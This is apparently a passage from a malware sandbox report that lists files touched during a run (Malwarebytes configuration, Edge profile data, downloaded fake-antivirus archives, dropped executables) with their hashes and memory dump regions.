| SHA512 | cc3adbc0380f49dcde92d95dffc5b06c13c836291af4841e413fcd1bd286208be3d4464684a0c6820d62b207e6e92ea7469f4963fc3f97779fc1715433743701 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | c1692e0ae37feef95be31a154a36a5b6 |
| SHA1 | 70f723e05daf36276c8746205458e2691265653d |
| SHA256 | c3ed0bfe4a127a18fa15146ecb76241d9407c6a11e84aa9d4f33dbb2e646732f |
| SHA512 | b648b79dc009214a60ca51c6c2e0633b0727f64721dbb2615215e08c9968c19952edd4e7aded26e0c5bb2c8e922685baba99f9125112bfa87c6e6982baf80181 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 6f984181126efa53cd6e6b72321f75c4 |
| SHA1 | fa4e268e97ee33fd1121c5691e4b41402516c9d4 |
| SHA256 | b2bb80c33ec01c73740b8ce6b020cee926db6e0155aea4d9a15db1c002635b6f |
| SHA512 | cf1bb35e7d463cc874575cf711f9ea88a9e8d5152b056abb678d3282aecec9ef778d5c0267eb5fa0deba6f1db32d16e016f4aeeee7aef31fb9b08dde546d403d |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | b84d1b189b0679267607e1ca4bcd66d8 |
| SHA1 | fb1bdce3d08d321e3fb564a86d2edbc7acb2f400 |
| SHA256 | bd04e6d2999eabda6028fbb53c12c1aa84ce2f94bd0d712d122801d1c503ff69 |
| SHA512 | 508b7cc791a398a7e81e209c84b7016b46dff0a96b1f55658843e06bfe77d01a88f9446b62fe8ef6c15b16c27010076b53e3b5315188b494e45f05d2e35bcfa6 |
C:\ProgramData\Malwarebytes\MBAMService\638b85f3-170c-1351-1b6dd16fa101b873
| MD5 | 856f6ba813d0bd232817be42d277fe0c |
| SHA1 | a9f8be1ce91f9b8fa7e967ad30dc5c50cd6b9b5e |
| SHA256 | f4fced4fbba70a23e261cba1b765d734de2cbed3c8996095117375906f6b8a23 |
| SHA512 | f5f88a23541f25ad880b30758fe835001a2f2fa1668ff524eb7e7d6c8c4e03b6c319101d5cd7e7a0117bbb648b7e2543d75c823814492b5d655adade4bd178df |
C:\ProgramData\Malwarebytes\MBAMService\tmp\aa51688cea3411ee980662d9003ae027
| MD5 | 5fd1bef64e587bf3e705e368f9e0e9b9 |
| SHA1 | b32d7705c277687e8fd324ba73d8f251f7aa6706 |
| SHA256 | b3d276f72bfdad28c431d4be37ea8519ff4a61a436206576ca0eebc59f3e2ca3 |
| SHA512 | 650356e0eb47587197d6d02c3a51e391c12c0208d0a0d0b6dde67e0f0bfccc4af47c830b1514f81cef4792df74c9c5bde14db1efcde3d00b9cc358b20ecd998f |
C:\ProgramData\Malwarebytes\MBAMService\tmp\aa737044ea3411eea09062d9003ae027
| MD5 | 3cce544e0fd4a56eae47687b8ecba334 |
| SHA1 | 4882c2dea29c878c484f0d39f326fd64cda129c4 |
| SHA256 | bb7ab80e4ce20bbd693e47e32d2d2b6a5c27a2c242678443a841abe0ccfdf6a4 |
| SHA512 | ac62c4527c5d759d142bfa98d7ebd1a0cd31ffcc7c1c8f0ab88948c0e8b7c8423730683d11ed668c856d57509aa7251efac8e4526c94944e20b2a7a9739de684 |
C:\Program Files\Malwarebytes\Anti-Malware\expapply64.dll
| MD5 | 99c8e47d747b36be8ffcfdd29b80dc3d |
| SHA1 | 9b8e87563fee31abf90bded22241f444b947b071 |
| SHA256 | 0db4dcdf3fbeef2c4d18555f479a28dde3d67ee6f0d27c18925207142b7a38f7 |
| SHA512 | f9cf4ec06585c6cde57011884141782bde83adf186f57f75576c8dade1e868d6b886daf8fa15c55ac908ff995c4b6323c3a8266dbd664b807cd67cf788f7074e |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json.bak
| MD5 | b8c401fa16b44c45b9552a62411303ba |
| SHA1 | abf14d96ebda7126b6b2c82e363a94c8c66f136a |
| SHA256 | ed33a50daf05dee2b5981825e841b0b2ae33d7d6665ec490ef13fd0e39cf6d3f |
| SHA512 | fddefb3902d3ce9998dfd0c70ea976a1614096c44ae563a50303a7abff9ed102fba7f23491f7b1ce42b7aab3ef8ce4044929f9ab364b0a083a8cfc53ce3ab1c9 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 83cfa0f8249d6f2552ab11f8126b2e99 |
| SHA1 | d3bb7c9667f27fd1ed5da7809b3a314ef0e85c61 |
| SHA256 | 10d1cbe5b288091ea2b988f6310561f8f28bdae67b9772452fa0d5c60fe49e15 |
| SHA512 | 5beca1824949728762e9cde9054c0037f42a8218b822f6bc9666b84c40d187c43c5e43c414c55bdce084197fd8899fad4e50473502b78236014d2e8867846cbe |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 3c082e78b8ce14d56fbf72a39141bda3 |
| SHA1 | 769f186dcf4b9b940186ab4218587452b52c41d6 |
| SHA256 | ff8d7a657d42a1fc998e2cdf83458cf73615cd6eb96d786d07f6524d52195bdc |
| SHA512 | c80e46949d39f6fa99d0108d53e28d7d0b1a4c24a8e5a04a766916715b181946c680d050aa18a241f6ec55f129e1ccd51802797ba199fe1d3fd8d3aa3205cc37 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 76f5ec892178d9615305187f27aae1e8 |
| SHA1 | bf09f136ff989d5e462ffc21c94798bb6dc0dabd |
| SHA256 | d2ff2d7929b0feb04c4ab02f3b75c34b5ea225eed45b501052e671052aa3918a |
| SHA512 | 2a8347211bfdb007922260c2bed5b37747fbbb939b92ef6451a3ee5dea208327bb1e4abd248a59e0584d3a1b859824eaff49e8401279d05212e8cf002f090703 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | a3ccdc4e40340076796704de7882e5c5 |
| SHA1 | f62ad9ce18a101be8e7de253e053bf174a308f86 |
| SHA256 | 1fae457d2474e63e9a5b129b494dc1200a941610dcd620fc771f9222baaec135 |
| SHA512 | 3170ec9b0d277fd94f13725cd7c1714ec6e6353161375c821c6285bf76577485609353f09a88821f0a78e45b68d8f4a64bdc066a655b4545f01b60eaae26c6fa |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | 615588c29e07f7371bbb0c047c5ab7fb |
| SHA1 | 33b729dfd47d4d294fa4995b16618ae9ae0bebed |
| SHA256 | f9163f1bd9b1fb2db12f337014c323b77a41395e7e823c444e390dcc643084a6 |
| SHA512 | be8d297ffc6f9ea7cc34af4d1f02f435550e650cdbf6e1bbc5e3a66f72465e6eee41c0b279f860e311987f0bac6c7a11ac50fd2ee927d4ee1722dee2523440b1 |
C:\ProgramData\Malwarebytes\MBAMService\ScanResults\7219a01a-ea34-11ee-a180-62d9003ae027.json
| MD5 | c776c674c371983bdc7f64b0603381b3 |
| SHA1 | a8584e049c43da747927496ef5a25ce8266a58ce |
| SHA256 | 3998b1cbfd5ddd63b298d8f0e0e8be8629fd1e62bfdf258d30f856e900bd15a5 |
| SHA512 | a10b0afbb6b87516a5d64660a9779763efe7af0962ffe7568d9021bd1780cd56295055beb9db88393827b520a2a727932d727a6922f6fc1a49932ca3d797f33f |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\a0166444-ea34-11ee-98f5-62d9003ae027.quar
| MD5 | 85b1e8d44304519cd277168764f08495 |
| SHA1 | bb507dd7be3bd2196c32dd53c75cae73e165a572 |
| SHA256 | e60576a807b337cc942167969d7ea1c235360a5d966d7ab73887ea1faadde731 |
| SHA512 | 76f708a0354af0b6b9bb2555c455f4def0f47e1f1dfd52bd58772191fd31b974945da684b69d64024c102a1c7169c58b3d9f5a0cdf455fd1c0477664eb0929f0 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\a57f4720-ea34-11ee-ac25-62d9003ae027.quar
| MD5 | 799b9c7f1342355ab5199e4cd0ed193f |
| SHA1 | 24186c916582edc952dffb43954550c8055dc2a1 |
| SHA256 | f2036993f75be6ebbc74eff5626590b6a54b384a858ddea8e1321fed53d42022 |
| SHA512 | 22b3f975ed2a54fefb7a4b43928426a7d2a443eb3cccefa5e882fe3208cabcf23f5e5c9c6fd4d0f46014f9959968c57aa0eb9132d5baeb095e8d227746f7764b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | afcebe9ec517642ce88d1b91f64f6d0b |
| SHA1 | e0fa65af5831745d8f79f9fa20812625920bb73e |
| SHA256 | 4a66447f2ed3d05ff3b7d008d7a80ef0f173fc8985b28f07aced6479ad0b14c8 |
| SHA512 | a85e787da267c448de4b7aa9861f6c27fb2f0f22f30c587f3b6796a51caa9d87e9c3e6cf04cf72bab148ebc4c3abd63c75b2125ceb27ed49ed6f40dba3de1b16 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 589c49f8a8e18ec6998a7a30b4958ebc |
| SHA1 | cd4e0e2a5cb1fd5099ff88daf4f48bdba566332e |
| SHA256 | 26d067dbb5e448b16f93a1bb22a2541beb7134b1b3e39903346d10b96022b6b8 |
| SHA512 | e73566a037838d1f7db7e9b728eba07db08e079de471baca7c8f863c7af7beb36221e9ff77e0a898ce86d4ef4c36f83fb3af9c35e342061b7a5442ca3b9024d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 62dd25f5a7ba51e51597e2173cdc4bdd |
| SHA1 | f700d75d6af15fe186e87286c07587e17d276bec |
| SHA256 | 1486fd22477e966f37d385cbbfef84f8ea609761772e02fad1b2c1fb0d9df02e |
| SHA512 | 867fef190ee2b79bc9852f5544a7abeb133dff60da0812b9471d9d368bae54e80665dd7cb84459d3fa49efa59e9196b945522df1ddaeb793fe77bc824ef54ca8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | fa5105b47027f1486522223227c9f3be |
| SHA1 | 39a1ce670cf20e8be56352057484c5e156a46192 |
| SHA256 | 3c1a22ea5d826e1f2dcaa61e1d1034e45ee99254765befed2b3e1a9fa29a7c4f |
| SHA512 | aafbb2c863febf5104ad68dfd3a1e58e2c07e33cbc20a4c02168b52f7648087644b45ce79ea35c9157381666dd6f68d14fb4de1896101313aa229c8f15676787 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | eee179ee51994a4e8d69c3471bf59419 |
| SHA1 | ea34c6cf4b2b3bef40b104f554b2b63fa94fa041 |
| SHA256 | 4fb7c3d775abf9fec9a8cffc144a95c62f3b3a365d6eb0b14d39305a51b79e45 |
| SHA512 | 52112a51a2bf9e793d26132b29f92602e0e0504ed07cae34dc04bb7b26ab36679655189ad3b48b64b23df15d9211f16c426d94c7f0ca93139fbdbaa62c07e1c2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 735f71dcb5ae1482187ffb54a8ad5a8c |
| SHA1 | 109450425c396b004495b6976aacbc22fcf3bfd8 |
| SHA256 | 6d6fe913e7778c8193e982ab14b5eed23397da6f3c9c295b07e06f8bcff0d0dd |
| SHA512 | b69cd8cdee3d6fb15f46e96055839e8cfc4887589df6be64cad20bcff973d4137f92bb1718cb9936c77e5ee6d3a9c06dd99ea61bf84e16a9324337b53dc820d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe6649c2.TMP
| MD5 | 2055d361e2a6be754c12b293ec287053 |
| SHA1 | 98f7cdb510cc0777c375d38ffebda0658eb5da87 |
| SHA256 | dbf559898392793c3370f80fdc3222352759236245cef82801a7fd9a000abc21 |
| SHA512 | 26f14517fdae00979577d664778d6073dd7f8712d4f0e719af5b6cfc658cfaf9acc1c39f2b962500e81152c8396872353b92c32d22e8a73162796e5119e63c73 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | f3895225f691b57c425f1341172db287 |
| SHA1 | 4c364cd05717e829c8b7d4ea340e93f60f75fc05 |
| SHA256 | 2bd41acf7fb419f8b8240eff12d53ec3a2dac239fd2b35ec999550e5aaa3bed6 |
| SHA512 | c90b039b3c1c130c6b347d56333f07c981722df759d368b9d72b17d48d0e4b6632897af98877451f1785cb76b8ad684377af93119f426bee3191f4593447cfe9 |
C:\Users\Admin\Downloads\AnViPC2009.zip
| MD5 | 9a38c29ff9e12ba2892381eb51c79934 |
| SHA1 | 76fcf6bcaac32f624fa0154a9177e44469b5886a |
| SHA256 | 45b75a116aa3b07f90a7c2d9a83c2cde524797df88bb5e20f9dc1e74d8527861 |
| SHA512 | c26d8c252d6f18a2ae4419bbfe27099862a625cbc40d8f104fa20cb361da112ebe6a17935ac3613c24b58f9c291d2219e55f59e0fa40b81f92fccf190115e734 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 06df33a7991debbdf5402068d09a3e4e |
| SHA1 | 0f39396e4a4c04f1359858ac510ad112f30b0350 |
| SHA256 | 1134e93270165839e45dabf19e06339185db5216a1439fa0e83061cfad569a59 |
| SHA512 | 05f458e513e39af3cd29b8490ad20578ca3fc3931b1b1d062d47b2e767afcde5e80b1ccce020161753c047db2f44064469d1df5f0cc31dab1b4e67ed96b0a07f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000060
| MD5 | 1876b2d886ec392d71f37423dfef0c11 |
| SHA1 | af78db6206cada4f780f030d45fcaa881f892a99 |
| SHA256 | 61ff034c476d4060fbea6debc5f84494cf02f337a9a897ddb6b3eb3a28c16406 |
| SHA512 | 9070d1c35ddc045c7d5aa7938d231d139437c0b363c72a71d1edf3b77ea40484869c92e3dc9b021c2897d224d3f2b6bcf64b4dcf44149da9d6cc15d4dfa9951e |
C:\Users\Admin\Downloads\Antivirus Platinum.zip
| MD5 | ff84853a0f564152bd0b98d3fa63e695 |
| SHA1 | 47d628d279de8a0d47534f93fa5b046bb7f4c991 |
| SHA256 | 3aaa9e8ea7c213575fd3ac4ec004629b4ede0de06e243f6aad3cf2403e65d3f2 |
| SHA512 | 9ea41fe0652832e25fe558c6d97e9f9f85ccd8a5f4d00dbcc1525a20a953fbd76efb64d69ce0fdd53c2747159d68fcb4ac0fa340e0253b5401aebc7fb3774feb |
C:\Users\Admin\Downloads\Antivirus Pro 2017.zip
| MD5 | ab1187f7c6ac5a5d9c45020c8b7492fe |
| SHA1 | 0d765ed785ac662ac13fb9428840911fb0cb3c8f |
| SHA256 | 8203f1de1fa5ab346580681f6a4c405930d66e391fc8d2da665ac515fd9c430a |
| SHA512 | bbc6594001a2802ed654fe730211c75178b0910c2d1e657399de75a95e9ce28a87b38611e30642baeae6e110825599e182d40f8e940156607a40f4baa8aeddf2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4aed2a4f-1ae9-44f6-b46a-15d10f849327.tmp
| MD5 | 79f86031a27f0228926bae6530e0ad0d |
| SHA1 | 7858e5a0c1894c0a7ac51890304e4faeff1596dc |
| SHA256 | c318ab15cd5b4a4efbf2e8facf2c1a8565be67b5fec7da44aa3038727961b6f3 |
| SHA512 | c7431cd4d56a4bc869f7d45a31af77e8eac220860f6e5253c9d2a62b21005f82c8b708ee3b784e99a8b0c2092eeb8f14cd18939ebd8cda87ba95dab245f83774 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 19ef7fbc5f03ee17612de96d53f75136 |
| SHA1 | c9e836ab20a3cf42c6b458a699773ab7941e677f |
| SHA256 | 030b3a5fb12fafccac55c2351956c78b157e8efd978241cda355abca315c9091 |
| SHA512 | aa15bfd0b3450de798c63ed2e6d765702ac473db859cd36f9958c3302b7b094503e7270f00ee8dda7c9c41cd8d268f15a1c8208eef727143a5ab1cf0056ed67b |
C:\Users\Admin\Downloads\Antivirus.zip
| MD5 | e1ac4770f42bac0e4a6826314331c6ea |
| SHA1 | 66493386ad995819871aca4c30897b6f29ab358f |
| SHA256 | eabf7fdd31c5838d66ccbc3ca52b0f6eaf8120f83eed43f372f21e4d31734b73 |
| SHA512 | e691103064075b24b1fc2f5b4d1a1c2701ee7c5074c96a7faaf284f975de3d7309e7a3ea9b80fb6a2d8950a3b12aceb22e3516777508cac70cba8be48527f55c |
C:\Users\Admin\Downloads\CleanThis.zip
| MD5 | fcdf496c1869b16e8c4964b28da8af0b |
| SHA1 | b965397f9fc13ec934b1357ef5754af5c212b7f4 |
| SHA256 | 37a88b905f8ed19e1bd94fd282f575e2cfc58a83e35e922d1a35a0cc42bd61c6 |
| SHA512 | 1e560fbc9ae022266d7ec80b5b324c53f43501c113789361aa899999b9d98f9e0f167881a02aa2e534695a0ed32fe989cf4bd13f5c17cb8237a3744a0c424938 |
C:\Users\Admin\Downloads\FakeAdwCleaner.zip
| MD5 | 6d8c9d01ba5c32aedc734087cc3d0b1b |
| SHA1 | f7e58e5edd203abc2364922b11b6641d3ee9add5 |
| SHA256 | 92e885d1763e4ba1abc92bee9b08ca7a2ae358bda5fe98b31a8e217327982bf7 |
| SHA512 | 090b972e7d854dee8c1dc45ee3035247eb8ab641c337ff8da6dc3dbb84fa447deee688f760d36fdfb93cca50d4ab27b5ab3347f75c5e4207a06e0ada0607e3f7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 17c5b7181f693f74f791ceab4d18fead |
| SHA1 | 1ecc5e26a999b7836b00490a26cd96ef31e87bd8 |
| SHA256 | f3669887ae212e758576fb427775045999da9811caf98fcc1e988a49df9599b2 |
| SHA512 | 1babfd6e26f29ca42f581c3af8d76cbf5c3c71ee4065e6a5ec5c7b2cd8cb85214fba0d6da0a99574c1982429cf26df4d60459f878f0a9204da515309a39141b5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000066
| MD5 | 974918541aa75f380aa6cb4d8bd3c4bd |
| SHA1 | d0a6a3a301cf5330b00281ee8ff04ed9c3455fc7 |
| SHA256 | d703fc0de3f07684528bc1931479815a4b9cd7b66fedbb753ca21314a6a300d6 |
| SHA512 | db829bba3372a6e452d03d24e998ee91d28e3816c9d1a8d81330d450b24dc695e15d2612ec69729beafb28d95271ba55b6be8b95dbe7f4b15f4f65bf5b5279b5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | fccaca30bc82d71f5706ab00af1c4114 |
| SHA1 | 38179e2fca6a0fb00c5d525a79ad9853e5b2ff19 |
| SHA256 | 1735f593c2c417ffa192ece4b4af47691e45cbc2b9655d958a79d2d167ff8d23 |
| SHA512 | 1b5f65d4e2901d22d673ec82a78638b40039095487d93d0192c88f904bb3ee18d866dfa37b9da7f20ff4f56e75d70ae08096241461e5a6fc5604bcbb5ba180c0 |
C:\Users\Admin\Downloads\Live Protection Suite 2019.zip
| MD5 | 7a5994fab80a2ed6adf59a93c7bc2d88 |
| SHA1 | fe2ddcefd45c378dfb19817de118fcf151c59b1f |
| SHA256 | 6ebad2ea4d537eb1ce11dd19d495fca3e2b8b4e50140d9b241b71f5f1bc71804 |
| SHA512 | 5ba499f12ed0a5de31350530402327dc323aae7d414ee972bd652265e5226adef71d94c0b52a3bf0ebe8f95081c3c27708758ef15da58163492afdb664e08ad2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ad84c3b3b3f53c910cc872e9dae2d58f |
| SHA1 | 7711c4b6203804dbb9f0a474a4f6a9275dd491e5 |
| SHA256 | 8db7d9345a8c0504a69ff92b67d54d36a0b485f8624ddb80efae2ee9aaf9d9c3 |
| SHA512 | 7b2ccc16353905192ac454ebac8b31706f071d140a295c407749ca40e69db842b322d656b9904b8fe8ce13a9896d9b3f9e79019402850f66004d33f50fd66d76 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8d8a926f01e5ca8b4f2f111ef2646af2 |
| SHA1 | da0e6ae6a96455ef7b374f13086e6f47cb628e64 |
| SHA256 | 2b772bceb06ad6e16cf71ed17f70c5297283a076dab5e72e038870db0160b3af |
| SHA512 | 247f797217df744a77cf737f0ac12b515498437562920e82e183fcdac8ccde1ac963403086b3a8ce8bc02a8174b73b1eccb2f136fdc358b9ad26fa50e28ab953 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 959787244498cff4804cb9e25b8b6b29 |
| SHA1 | 1ca86967acb7f31d2e5c4d0442f6a3d57d1d36af |
| SHA256 | 78374935b6835d967ff489666033e8918d87c7eafefc7d9b44779103d6c32e23 |
| SHA512 | 056f226da195c0b2b8455daa24564dca993731e643eeac08adfe480e839f341ba3397d7d6a1bd304575a9d43a40797b31356b57e5a6a96c8b1d3aabb6a3d1fa5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 070ed8d55a0408d51739c5248b8ab5e6 |
| SHA1 | e8fe89898a6d9ed004bfe656af9353e723fb21e5 |
| SHA256 | 5c4df3216738334814573fec21a12e9732094a8491ac9814aa3e04c40b1d8600 |
| SHA512 | 3ca668af4588be29740c46ead5d02acbde5113a10e697d7693ce77d0b2b9af36ed106c4f4734274a4c0f68531be804ce6ee42a69f7ddedcd8e2af56fcc55c5b9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 38ca20e48e097675943e41793a4b2277 |
| SHA1 | bd443852f5d8ff21eb16e02ad27e65f65d64be84 |
| SHA256 | a97bccc76ad76d3676ed97e1ed54004f0bf92c99f7b88c97dd29f19346c195f2 |
| SHA512 | 367057b39c351969fe1fd88f637f34fc2fb06e10800c6315fd3c7021930ee0e6797d82f6b3eab1ebd212df563b38b79391ae3309188396392a89871c62db2cbf |
memory/5384-10404-0x0000000000400000-0x0000000000A06000-memory.dmp
memory/5384-10406-0x0000000000A50000-0x0000000000A51000-memory.dmp
memory/4500-10410-0x0000000000680000-0x0000000000872000-memory.dmp
memory/4500-10419-0x00000000050D0000-0x000000000516C000-memory.dmp
memory/1556-10418-0x0000000000400000-0x000000000057F000-memory.dmp
memory/4500-10411-0x0000000072450000-0x0000000072C00000-memory.dmp
memory/4500-10424-0x0000000005720000-0x0000000005CC4000-memory.dmp
memory/5384-10422-0x0000000000400000-0x0000000000A06000-memory.dmp
memory/5384-10427-0x0000000000400000-0x0000000000A06000-memory.dmp
memory/5384-10429-0x0000000002C40000-0x0000000002C41000-memory.dmp
memory/4500-10432-0x0000000005210000-0x00000000052A2000-memory.dmp
C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe
| MD5 | 100b58478dfc9904ba2ee4b5e8f34ccb |
| SHA1 | c124a72961cb96f3310e4427c829979c6fce6377 |
| SHA256 | 3c6f29413656404f4cedd58f8e7dea5666e3272b3be0042fa2cb128740ed1304 |
| SHA512 | c6af1adef5f37e16ceb3e8bae874f624b5f351a6b9aec3d5f07faa3fc1cf2b0e1f27e3ba9e97d6bc78bb470132f06ed2f724d5aac1a0479025c0363d0fedd5f6 |
C:\Users\Admin\AppData\Local\6AdwCleaner.exe
| MD5 | 87e4959fefec297ebbf42de79b5c88f6 |
| SHA1 | eba50d6b266b527025cd624003799bdda9a6bc86 |
| SHA256 | 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61 |
| SHA512 | 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9 |
memory/4500-10456-0x00000000051B0000-0x00000000051BA000-memory.dmp
memory/4500-10460-0x0000000005440000-0x0000000005450000-memory.dmp
C:\Windows\302746537.exe
| MD5 | 8703ff2e53c6fd3bc91294ef9204baca |
| SHA1 | 3dbb8f7f5dfe6b235486ab867a2844b1c2143733 |
| SHA256 | 3028a2b0e95143a4caa9bcd6ae794958e7469a20c6e673da067958cbf4310035 |
| SHA512 | d5eb8a07457a78f9acd0f81d2f58bbf64b52183318b87c353a590cd2a3ac3a6ec9c1452bd52306c7cf99f19b6a897b16ceb8289a7d008c5ce3b07eda9b871204 |
memory/1556-10434-0x0000000000A40000-0x0000000000A41000-memory.dmp
memory/4500-10459-0x0000000005450000-0x00000000054A6000-memory.dmp
memory/4340-10463-0x00000000011A0000-0x00000000011B0000-memory.dmp
memory/4340-10465-0x000000001BF50000-0x000000001C41E000-memory.dmp
memory/4340-10466-0x00007FF8D3870000-0x00007FF8D4211000-memory.dmp
memory/428-10467-0x0000000000400000-0x0000000000410000-memory.dmp
memory/5540-10464-0x0000000000F40000-0x0000000000F6E000-memory.dmp
memory/4340-10471-0x000000001CAC0000-0x000000001CB66000-memory.dmp
memory/4340-10473-0x000000001CC10000-0x000000001CCAC000-memory.dmp
memory/4340-10476-0x0000000001150000-0x0000000001158000-memory.dmp
memory/4340-10472-0x00007FF8D3870000-0x00007FF8D4211000-memory.dmp
memory/4340-10469-0x000000001C920000-0x000000001CABC000-memory.dmp
memory/4340-10478-0x000000001CCF0000-0x000000001CD3C000-memory.dmp
memory/5540-10483-0x00007FF8D1EB0000-0x00007FF8D2971000-memory.dmp
memory/5540-10486-0x000000001BBE0000-0x000000001BBF0000-memory.dmp
memory/5540-10487-0x000000001BBE0000-0x000000001BBF0000-memory.dmp
memory/5540-10488-0x000000001BBE0000-0x000000001BBF0000-memory.dmp
memory/4500-10489-0x0000000072450000-0x0000000072C00000-memory.dmp
memory/4340-10490-0x00000000011A0000-0x00000000011B0000-memory.dmp
memory/4340-10491-0x00000000011A0000-0x00000000011B0000-memory.dmp
memory/5384-10492-0x0000000000400000-0x0000000000A06000-memory.dmp
memory/1480-10494-0x0000000000400000-0x000000000040D000-memory.dmp
memory/428-10498-0x0000000000400000-0x0000000000410000-memory.dmp
memory/1556-10501-0x0000000000400000-0x000000000057F000-memory.dmp
memory/5384-10503-0x0000000000400000-0x0000000000A06000-memory.dmp
memory/4500-10505-0x0000000005440000-0x0000000005450000-memory.dmp
memory/4340-10506-0x00000000011A0000-0x00000000011B0000-memory.dmp
memory/5384-10504-0x0000000002C40000-0x0000000002C41000-memory.dmp
memory/4340-10507-0x00007FF8D3870000-0x00007FF8D4211000-memory.dmp
memory/1556-10513-0x0000000000A40000-0x0000000000A41000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | ecf1b81ab2b3dc5f5c373b62b23cf347 |
| SHA1 | cbcf03dd5c4a0871ed562b7a7acddec685b67bdc |
| SHA256 | 09d34df16fb10d57f326d879cb7409eb7a58c65fb103c446cef8c65fe25ecde4 |
| SHA512 | a36ef74ff4d6a6f18e601934f827c525a513e78de21b7f3d1aee880181cd672d1fc295259cc1f622ca56e44688b20b7fbe6d6aa4b8b6786b72608f7558b8ff9f |
C:\ProgramData\Malwarebytes\MBAMService\ScanResults\7219a01a-ea34-11ee-a180-62d9003ae027.json
| MD5 | 90d0e1acd2ed272c4b401ccc937a8f15 |
| SHA1 | 3314ddca12b3da080d1f3e9bc8c85bdef3306b33 |
| SHA256 | 508437e47da2fc79954f87f36e9570e02ef00817c62f469206873835ec9b1f88 |
| SHA512 | f8b15a05c83d374f9af71e5c55faffa6b5eb2694018827534c6b579f21baa2b2f052cda4a839c1f5a04fa16674a0671915ad0f8dad5a596909bc49e40399e986 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 84f27bc30202635cf016f39b77f36ac2 |
| SHA1 | c6084fa257cd4c88e48569463b0961c7132d95df |
| SHA256 | f1bb4533afe3b0aa365fff10cefc39e95f1296ba159e573f031c5649b7eed46c |
| SHA512 | 7428b99a77fe7f63d0de67b8d42ab3734cc81166e3d3cbc6c1cac7ffd4e289d5c07215ed4b5ecb7e3b0fa75d735f1e4344d8102e333348b607b2dc7aacd5372a |
C:\ProgramData\Malwarebytes\MBAMService\dbclsupdate\dbcls.64bit.full.7z
| MD5 | 6bd2d5010e481277b8c00a4abd69490a |
| SHA1 | ee4481ed3d84cb13cfac1387bc6fa637447f9ce2 |
| SHA256 | 40814d5a5f0834272dc68e370c190a6a2bd849bd3f738724ae64b4f550056962 |
| SHA512 | beb878d697c700d1938bfd1905f561abb3478ec19bc19cdc2ef09d65222940339c93c23e8dc5cf71d0c4fd498d4bdb59dc058af65d6ad968660e698d98cc3dfb |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 1f287d98e0b875e81828100139ea8a2d |
| SHA1 | 397356ede8d0f58f1c29b6059bf82205659de3cc |
| SHA256 | 1bbaa6e6853ecca382d312121f9d3aac13cfb7d77e6aa44648d772a7c7961fe5 |
| SHA512 | b2c697da2da947648258cc4b59e382b4011656f77ab2dc3e527bad07bbf5e26df272d1ebf11cb8a7aefbec7ed17e2539e47aa5e7ada535a2de061c53b07c8d46 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 8d47edbfd5256b5593450e4d9d0afcdc |
| SHA1 | 38765b4ca4857cb48311824b227c4f1a455fa4b7 |
| SHA256 | d872fa93dd5e2cabc4c736a49b0a2403d2a7c0e9f4af64cb9baae28a5cf375f6 |
